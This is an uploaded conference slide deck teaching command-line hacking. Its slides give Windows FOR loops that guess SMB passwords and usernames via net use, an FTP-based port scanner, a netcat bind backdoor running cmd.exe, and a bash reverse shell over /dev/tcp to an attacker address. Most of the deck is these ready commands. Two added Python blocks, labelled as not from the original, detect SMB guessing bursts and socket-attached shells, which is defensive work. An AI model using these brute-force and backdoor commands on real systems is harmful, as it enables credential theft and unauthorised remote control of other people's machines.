
Hacking With Basic Command: Presented: Dedi Dwianto (Theday@echo - Or.id)

This document provides an overview of basic hacking techniques using Windows and Linux command lines. It discusses using tools like netcat, SMB sessions, FOR loops, and the /dev/tcp feature in Linux to perform tasks like port scanning, password guessing, file transfers, and creating backdoor shells. The document includes code examples for scanning IP ranges, transferring files over SMB shares, and establishing reverse shells using netcat or /dev/tcp connections. It aims to demonstrate common hacking methods that can be performed from the command line.

Uploaded by

pendekar jablay
Copyright
© Attribution Non-Commercial (BY-NC)
Available Formats

Hacking With Basic Command

Presented :
Dedi Dwianto
[[email protected]]
Contents
• Scenario
• Windows Command-Line Hacking
• Netcat
• Linux Command-Line Hacking
• Q&A
Scenario
[Diagram: Attacker, Internet, Firewall, Target Network, WWW, DNS]

e-rdc.org 2008


Windows Command
• Finding Other Machines
• SMB Sessions
• FOR Loops
• Password Guessing
• Port Scanner
• File Transfer
Finding other machines
• C:\>ipconfig /displaydns

• C:\>arp -a
Setting up smb sessions
• Set up session with a target

C:\> net use \\[targetIP] [password] /u:[user]

• Mount a Share on a target :


C:\> net use \\[targetIP]\[sharename] [password] /u:[user]
Dropping smb sessions
• Windows accepts only one username at a time
• Drop SMB Session
C:\> net use \\[TargetIP] /del

• Drop All SMB Sessions

C:\> net use * /del


FOR Loops
• Common Options for Hacking
• FOR /L : Loop through a range of numbers
• FOR /F: Loop through items in a text file
FOR /L Loops
• FOR /L loops are counters :
c:\> for /L %i in ([start],[step],[stop]) do [command]
• Simple Counter
c:\> for /L %i in (1,1,255) do echo %i
FOR /L Loops
• Run Multiple Commands
[command1] & [command2]

c:\> for /L %i in (1,1,10) do echo %i & ping -n 5 127.0.0.1

• Run Command1, and run Command2 only if Command1 ran without error
[command1] && [command2]
C:\> for /L %i in (1,1,10) do echo %i && ping -n 5 127.0.0.1
FOR /L Loops : Handling Output
• Redirect to nul : > nul

c:\> for /L %i in (1,1,10) do echo %i & ping -n 5 127.0.0.1 > nul

• Redirect to file : >filename

C:\> for /L %i in (1,1,10) do echo %i && ping -n 5 127.0.0.1 > result.txt

• Filter output for a string : | find "[string name]"

• Redirect Error Message : [command] 2>nul or [command] 2>>file
Simple Sweep Ping

C:\> for /L %i in (1,1,10) do echo %i & ping -n 5 192.168.114.%i | find "Reply"


FOR /F Loops
• Loop through text
– FOR /F ["options"] %parameter IN ("etc") DO command

• etc can be :
– The contents of a file
– String
– Command
Password Guessing with FOR /F
• Password Guessing via SMB
• You know Username
• Password list from John the Ripper’s password.lst

C:\>for /F %i in (password.lst) do @echo %i & @net use \\[targetIP] %i /u:[Username] 2>nul && pause && echo [Username] :%i >> done.txt
Username & Password Guessing
• Guess each password for each username with FOR /F
• We need 2 files: username & password list
• 2 variables %u and %p for username & password
• Use net use to try an SMB session
• Drop the SMB session if login succeeds

C:\>for /F %u in (user.txt) do @(for /F %p in (password.txt) do @echo %u : %p & @net use \\[targetIP] %p /u:%u 2>nul && echo %u : %p >> done.txt && net use \\[targetIP] /del)
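
Seen from the target, every failed `net use` attempt in the loops above is a failed network logon, so a burst from one source stands out in the Security log. The following detection is an added example, not part of the original slides; it assumes events were already exported to dicts whose keys (`time`, `id`, `user`, `ip`, `logon_type`) are names chosen here for the timestamp, Event ID, TargetUserName, IpAddress and LogonType, and the sample events are constructed.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

FAILED, SUCCESS, NETWORK = 4625, 4624, 3   # Security event IDs, logon type 3 (network)

def detect_smb_guessing(events, threshold=5, window=timedelta(seconds=60)):
    """Flag sources with >= threshold failed network logons inside a sliding window.

    Returns {source_ip: {"failures": peak count in one window,
                         "users": usernames tried,
                         "success_after_burst": users that then logged on}}.
    """
    recent = defaultdict(deque)          # source -> (time, user) of recent failures
    alerts = {}
    for e in sorted(events, key=lambda item: item["time"]):
        if e["logon_type"] != NETWORK:
            continue                     # interactive/service logons are out of scope
        src, now = e["ip"], e["time"]
        if e["id"] == FAILED:
            q = recent[src]
            q.append((now, e["user"]))
            while now - q[0][0] > window:
                q.popleft()              # expire failures older than the window
            if len(q) >= threshold:
                a = alerts.setdefault(
                    src, {"failures": 0, "users": set(), "success_after_burst": []})
                a["failures"] = max(a["failures"], len(q))
                a["users"].update(user for _, user in q)
        elif e["id"] == SUCCESS and src in alerts:
            if now - recent[src][-1][0] <= window:
                # A logon straight after the burst suggests a guess succeeded.
                alerts[src]["success_after_burst"].append(e["user"])
    return alerts

# Constructed sample events (documentation IP ranges, invented usernames).
T0 = datetime(2024, 1, 1, 12, 0, 0)

def event(sec, eid, user, ip, logon_type=NETWORK):
    return {"time": T0 + timedelta(seconds=sec), "id": eid,
            "user": user, "ip": ip, "logon_type": logon_type}

SAMPLE = ([event(i, FAILED, "alice" if i < 4 else "bob", "192.0.2.10") for i in range(8)]
          + [event(8, SUCCESS, "bob", "192.0.2.10"),
             event(3, FAILED, "carol", "198.51.100.7"),
             event(20, SUCCESS, "carol", "198.51.100.7")])

if __name__ == "__main__":
    for src, info in detect_smb_guessing(SAMPLE).items():
        print(src, info["failures"], sorted(info["users"]), info["success_after_burst"])
```

The single mistyped password from 198.51.100.7 stays below the threshold, while the source that cycles through two usernames is reported together with the account that logged on right after the burst.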
Windows Port Scanner With FTP Client
• Windows FTP Client C:\> ftp [IpAddress]
• Use the FTP -s option to read commands from a file : c:\>ftp -s:[filename]
• We'll write a loop that generates an FTP command file and invokes FTP to run the commands from that file
• Store the result

for /L %i in (1,1,1024) do echo Checking Port %i: >> ports.txt & echo open [IPAddress] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt
Windows Command Line File Transfer
• Use Windows File & Printer Sharing
• Redirect to Share folder :

C:\>type [filename] > \\[IPtarget]\[share]\[filename]

• Log in to the SMB session with the credentials taken from Password Guessing

C:\> net use \\[IPTarget] [password] /u:[username]


Netcat
• TCP/UDP Network Widget
• Reads data from standard in and sends it across the network
• Receives data from the network and puts it on standard out

[Diagram: NETCAT between SYSTEM (Std In, Std Out, Std Error) and NETWORK (Send Packets, Receives Packets)]
Netcat Functions
• Send File
• Port Scan
• Backdoor Shell Access
• Connect to Open Port
• Simple Chats
• Replay Data in TCP/UDP Packets
• Etc …
Netcat : Windows Backdoor
nc -l -p [port] -e "cmd.exe"
Linux Command Line
• /dev/tcp/ Hacking
• Open Connection to Other Machines
• Like Connect Back Shell
• /dev/tcp/[IPAddress]/[Port]
Backdooring via /dev/tcp
/bin/bash -i > /dev/tcp/[IP Attacker]/[port] 0<&1 2>&1

/bin/bash -i > /dev/tcp/[ip]/[port] 0<&1


nc -l -p 80 2>&1
[Diagram: Firewall, Deny Incoming, Type Command, Command Execute]
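
The redirection in the commands above is performed by the invoking shell, so the new bash's own argument list is only `-i`; what gives the process away is that its stdin and stdout are the same socket. The following check over a Linux /proc tree is an added example, not part of the original slides; the function names and the sample fd tables are constructed here.

```python
import os
import re

SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}
SOCKET = re.compile(r"^socket:\[(\d+)\]$")   # how /proc/<pid>/fd/N names a socket

def socket_stdio(exe, fds):
    """Return the socket inode if `exe` is a shell whose stdin and stdout are the
    same socket, else None. `fds` maps fd number -> readlink() target."""
    name = os.path.basename(exe.replace(" (deleted)", ""))
    if name not in SHELLS:
        return None
    inodes = set()
    for fd in (0, 1):
        m = SOCKET.match(fds.get(fd, ""))
        if not m:
            return None                  # a tty, pipe or file: normal shell
        inodes.add(m.group(1))
    return inodes.pop() if len(inodes) == 1 else None

def scan_proc(root="/proc"):
    """Walk a Linux /proc tree; return [(pid, exe, socket_inode)] for each hit."""
    hits = []
    for pid in sorted(filter(str.isdigit, os.listdir(root)), key=int):
        base = os.path.join(root, pid)
        try:
            exe = os.readlink(os.path.join(base, "exe"))
            fd_dir = os.path.join(base, "fd")
            fds = {int(n): os.readlink(os.path.join(fd_dir, n))
                   for n in os.listdir(fd_dir)}
        except OSError:
            continue                     # process exited or access denied
        inode = socket_stdio(exe, fds)
        if inode:
            hits.append((int(pid), exe, inode))
    return hits

# Constructed fd tables: the two redirection forms on the slide and a normal shell.
FULL = {0: "socket:[48211]", 1: "socket:[48211]", 2: "socket:[48211]"}   # 0<&1 2>&1
NO_STDERR = {0: "socket:[48211]", 1: "socket:[48211]", 2: "/dev/pts/0"}  # 0<&1 only
NORMAL = {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}

if __name__ == "__main__":
    for pid, exe, inode in scan_proc():
        print(f"pid {pid}: {exe} has stdin/stdout on socket inode {inode}")
```

The reported inode can be matched against the inode column of /proc/net/tcp to find the remote endpoint; shells started by socket-activated services will also match and need allow-listing.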
THANK YOU
